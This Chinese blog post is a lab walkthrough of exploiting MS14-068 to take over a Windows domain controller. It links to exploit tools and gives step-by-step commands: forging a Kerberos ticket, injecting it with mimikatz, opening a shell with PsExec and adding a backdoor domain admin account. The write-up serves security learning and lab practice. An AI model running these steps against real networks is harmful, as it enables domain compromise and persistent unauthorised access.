zoukankan      html  css  js  c++  java
  • 域渗透(三)获取域控MS14-068

    域环境

    域名  ddg.admin.com

    win 2008 DC1   192.168.91.2  默认网关192.168.91.1

    win7    192.168.91.131   默认网关192.168.91.2    win7            1qaz@WSX

    MS14-068

    参考链接:https://www.cnblogs.com/yuzly/p/10859520.html

    https://www.freebuf.com/articles/system/197160.html

    https://blog.csdn.net/qq_43001579/article/details/84964412

    ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

    Ms14-068.exe 下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

    PSexec下载地址:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe

     mimikatz地址 http://blog.gentilkiwi.com/mimikatz

    一、漏洞利用前提

      1.域控没有打MS14-068的补丁

      2.攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid

    自己本次测试查看域控有没有打MS14-068的补丁(KB3011780补丁),可通过systeminfo来查看

    二、测试

    在win7中测试dir 域控 ,拒绝访问域控的C盘,可以访问同一个域中的win2003的C盘

    进入MS14-068目录

    MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

    -u 域账号+@+域名称,这里是ts1+@+yunying.lab

    -p 为当前用户的密码,即ts1的密码

    -s为ts1的SID值,可以通过whoami /all来获取用户的SID值

    -d为当前域的域控

     

     会在当前的目录下生成一个ccache的文件

    进入mimikatz

    mimikatz # kerberos::purge          //清空当前凭证
    mimikatz # kerberos::list           //查看当前机器凭证
    mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中

    之后输入命令 dir \域控\c$     //这里的域控地址最好和上面的 ms14-068 -d 的域控地址相同,包括大小写,不同的话可能不能访问

    win7可以成功查看域控win2008的C盘

    使用PSTools目录下的PsExec.exe获取shell:

    PsExec64.exe  域控地址  cmd.exe

     添加域管理员用户

    net user ms14-068 1qaz@WSX /add /domain
    
    net group "domain admins" ms14-068 /add /domain

    这个貌似也是有时间限制的,有有效期,过一会 指定网络名就不再可用

    finished

  • 相关阅读:
    第六周作业
    2019第四周作业(基础作业+挑战作业)
    第三周作业
    2019第二周基础作业
    求最大值及下标值
    查找整数
    学期总结
    打印沙漏
    币值转换
    远程连接centos7的mysql5.7+ 更改iptables方法
  • 原文地址:https://www.cnblogs.com/liqik/p/13181400.html
Copyright © 2011-2022 走看看